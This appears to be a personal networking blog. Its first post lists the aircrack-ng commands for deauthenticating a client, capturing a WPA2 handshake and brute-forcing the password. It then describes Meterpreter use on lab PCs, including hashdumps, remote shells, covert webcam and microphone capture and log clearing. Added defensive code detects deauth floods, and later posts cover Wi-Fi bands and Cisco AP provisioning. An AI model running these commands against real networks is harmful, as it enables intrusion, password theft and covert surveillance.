Security insight: Cracking WPA2 and fun with Meterpreter

So my wife wasn’t well for most of the weekend and the kids were busy doing their stuff, so I got some time to play around 🙂 in my home lab. Here’s the thing:

It took me less than 5 minutes to obtain a WPA2 handshake and less than 5 seconds to brute-force the *.cap file that contained the password post-handshake; obviously it’s only as good as your word list.
Key commands are:

airmon-ng start [wireless interface]
airodump-ng [monitor interface]
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
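The handshake capture above depends on a client being knocked off the network with deauthentication frames and re-associating. From the defender’s side, the thing to watch for is a burst of those frames. The following is an added example (not from the original post or the aircrack-ng project) of a small flood detector over 802.11 frame-control bytes; the frame records, BSSID and client MAC are constructed inline to stand in for a monitor-mode capture or WIDS sensor feed, and the window and threshold values are arbitrary choices.

```python
"""Detect deauthentication / disassociation floods from 802.11 frame records.

Added example, not part of the original post. Input frames are constructed
below to stand in for a monitor-mode capture feed.
"""
from collections import defaultdict, deque

# 802.11 frame control, first byte: bits 2-3 = frame type, bits 4-7 = subtype.
MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12      # 0b1100 -> first FC byte 0xC0
DISASSOC_SUBTYPE = 10    # 0b1010 -> first FC byte 0xA0


def frame_kind(fc0: int) -> tuple[int, int]:
    """Return (type, subtype) decoded from the first frame-control byte."""
    return (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF


def is_deauth_like(fc0: int) -> bool:
    """True for management frames that tear down a client association."""
    ftype, subtype = frame_kind(fc0)
    return ftype == MGMT_TYPE and subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE)


def detect_deauth_flood(frames, window_s: float = 2.0, threshold: int = 5):
    """Flag any transmitter sending >= threshold deauth/disassoc frames within window_s.

    frames: iterable of (timestamp_s, frame_control_byte0, transmitter_mac, receiver_mac).
    Returns one (transmitter_mac, window_start_ts, count) alert per offending transmitter,
    raised the first time the threshold is crossed.
    """
    recent = defaultdict(deque)   # transmitter -> timestamps of recent deauth-like frames
    alerts = {}
    for ts, fc0, tx, _rx in sorted(frames):
        if not is_deauth_like(fc0):
            continue
        q = recent[tx]
        q.append(ts)
        while q and ts - q[0] > window_s:      # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and tx not in alerts:
            alerts[tx] = (tx, q[0], len(q))
    return list(alerts.values())


# Constructed sample traffic (hypothetical addresses): normal frames, one genuine
# deauth at an idle timeout, then a burst of spoofed deauths "from" the AP.
AP = "aa:bb:cc:dd:ee:01"        # constructed BSSID
CLIENT = "12:34:56:78:9a:bc"    # constructed client MAC

SAMPLE_FRAMES = [
    (0.0, 0x80, AP, "ff:ff:ff:ff:ff:ff"),   # beacon (type 0, subtype 8)
    (0.5, 0x08, CLIENT, AP),                # data frame (type 2)
    (10.0, 0xC0, AP, CLIENT),               # single legitimate deauth
    (10.2, 0xB0, CLIENT, AP),               # authentication frame on reconnect (subtype 11)
] + [(20.0 + i * 0.1, 0xC0, AP, CLIENT) for i in range(8)]  # burst of 8 deauths


if __name__ == "__main__":
    for tx, start, count in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"ALERT: {count} deauth/disassoc frames from {tx} within window starting t={start}s")
```

A single deauth per client is normal (idle timeouts, roaming), so the detector keys on rate, not presence. The mitigation that removes the problem rather than just detecting it is 802.11w Protected Management Frames, which authenticates deauth and disassoc frames so that spoofed ones are discarded by the client.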

Further to that, and in about as much time as it took me to read up on Meterpreter (with recognition to Offensive Security), I was able to access a couple of Windows PCs on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and, probably the most impressive and most worrying, was able to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. :/  Oh… and I cleared the logs as I left the scene, all within a couple of hours.

So keep those systems secure and up to date peeps!

Lake Argyle – Sat and SSN

A quick install of satellite communications, using the Telstra Iterra network and SSN (Silver Spring Networks) access points in remote WA. This is one of a few APs that have to be satellite-connected because there is no 3G/4G coverage. Nevertheless it worked as expected. These SSN APs operate on both 900 MHz and 2.4 GHz, which increases the capacity and reliability of the meshed network, ultimately providing access for and supporting smart meters out bush.

Working in 40-degree heat with shade provided, courtesy of Horizon Power 👌🏼


2.4GHz and 5GHz Wireless

OK, so what’s the difference between 2.4 GHz and 5 GHz wireless?

The 2.4 GHz band reaches farther than 5 GHz because higher-frequency waves attenuate much faster. So if you are more concerned with coverage, select 2.4 GHz rather than 5 GHz.

The second difference is the number of devices on each band: 2.4 GHz suffers more interference than 5 GHz.
  1. The older 802.11g standard only uses 2.4 GHz, and the majority of the world is on it. 2.4 GHz has fewer channel options, with only three of them non-overlapping, while 5 GHz has 23 non-overlapping channels.
  2. A lot of other devices also use the 2.4 GHz band; the biggest offenders are microwaves and cordless phones. These devices add noise to the medium that can further decrease the speed of wireless networks.
In both respects, deploying on 5 GHz is the much better option, as you have more channels to isolate yourself from other networks and there are far fewer interference sources.
However, radar and military systems also operate at 5 GHz, so 5 GHz wireless may also see some interference, and many countries require that wireless devices operating on 5 GHz support DFS (Dynamic Frequency Selection) and TPC (Transmit Power Control).
To summarise:
  1. 5 GHz has a shorter range than 2.4 GHz;
  2. The 2.4 GHz band is far more crowded than 5 GHz, so devices on 2.4 GHz suffer much more interference than those on 5 GHz;
  3. Fewer devices are capable of using 5 GHz than 2.4 GHz.

If there is too much interference around and your clients support 5 GHz, it’s recommended to use a 5 GHz wireless network; otherwise, select 2.4 GHz.
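Two of the claims above (only three non-overlapping 2.4 GHz channels, and shorter reach at 5 GHz) can be worked through numerically. This is an added example, not from the original post: it places the 2.4 GHz channel centres (2407 + 5 × channel MHz, channel 14 at 2484 MHz), picks a non-overlapping set greedily for a given channel width, and compares free-space path loss between the two bands using the Friis formula. The 22 MHz default width is the 802.11b DSSS mask that the classic 1/6/11 plan comes from; the 2437 MHz and 5180 MHz centre frequencies used for the band comparison are simply channel 6 and channel 36.

```python
"""Channel overlap on 2.4 GHz and band-to-band path loss. Added example, not from
the original post."""
import math


def channel_center_mhz(channel: int) -> int:
    """Centre frequency of an IEEE 802.11 2.4 GHz channel (1-14)."""
    if channel == 14:            # Japan-only 802.11b channel, offset from the 5 MHz grid
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError("2.4 GHz channels run 1-14")


def channels_overlap(a: int, b: int, width_mhz: int = 22) -> bool:
    """Two channels overlap when their centres are closer than the channel width."""
    return abs(channel_center_mhz(a) - channel_center_mhz(b)) < width_mhz


def largest_non_overlapping_set(channels=range(1, 14), width_mhz: int = 22):
    """Greedily choose channels from the lowest upward that do not overlap each other.

    With the 22 MHz DSSS width this yields the familiar 1/6/11 plan; with a strict
    20 MHz OFDM width and channels 1-13 available it yields 1/5/9/13.
    """
    chosen = []
    for ch in channels:
        if all(not channels_overlap(ch, c, width_mhz) for c in chosen):
            chosen.append(ch)
    return chosen


def free_space_path_loss_db(distance_m: float, freq_mhz: float) -> float:
    """Friis free-space path loss: 20*log10(d_m) + 20*log10(f_MHz) - 27.55."""
    return 20 * math.log10(distance_m) + 20 * math.log10(freq_mhz) - 27.55


def band_loss_delta_db(distance_m: float = 10.0,
                       f_low_mhz: float = 2437.0,    # 2.4 GHz channel 6
                       f_high_mhz: float = 5180.0):  # 5 GHz channel 36
    """Extra path loss at the higher band over the same distance (independent of distance)."""
    return (free_space_path_loss_db(distance_m, f_high_mhz)
            - free_space_path_loss_db(distance_m, f_low_mhz))


if __name__ == "__main__":
    print("Non-overlapping (22 MHz DSSS):", largest_non_overlapping_set())
    print("Non-overlapping (20 MHz OFDM):", largest_non_overlapping_set(width_mhz=20))
    for d in (10, 30, 100):
        print(f"{d:>4} m: 2.4 GHz {free_space_path_loss_db(d, 2437):.1f} dB, "
              f"5 GHz {free_space_path_loss_db(d, 5180):.1f} dB")
    print(f"5 GHz penalty: {band_loss_delta_db():.2f} dB")
```

The roughly 6.5 dB free-space penalty at 5 GHz is before walls and floors are counted, which attenuate 5 GHz more again; that is the practical reason the post recommends 2.4 GHz when coverage matters more than interference.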

Cisco: Air Provisioning

I was recently asked to design a point-to-point wireless solution, which quickly became point-to-multipoint. Regardless of the design, the access points used were AIR-AP1532E-UXK9, with a view to utilising the 5 GHz back-haul and a 14 dBi directional antenna to cover the line-of-sight link.

These UX access points address worldwide regulatory compliance by dynamically setting their regulatory domain/country based on their GPS location. Sounds simple, right? It is important to point out, though, that you can’t use 5 GHz until the AP has been provisioned, as the 5 GHz radio stays in scanner mode.

However, provisioning of these access points is carried out either by the smartphone method or via a WLC. I needed to use my iPhone, but the Apple iPhone app was broken (confirmed by Cisco: Bug ID CSCuw28658), nor did the Android app work, but thank you Windows smartphone :), you saved the day (never thought I would say that).

I followed the User Guide to set the domain, remembering to use WPA2 and the default userid/password for AP provisioning, not the SSID password :-/

The un-provisioned AP looks like this:


The provisioned AP (to Australia/NZ), looks like this:


Got there in the end, but dear Cisco, I’m unimpressed with the process for provisioning these APs; it definitely needs improvement.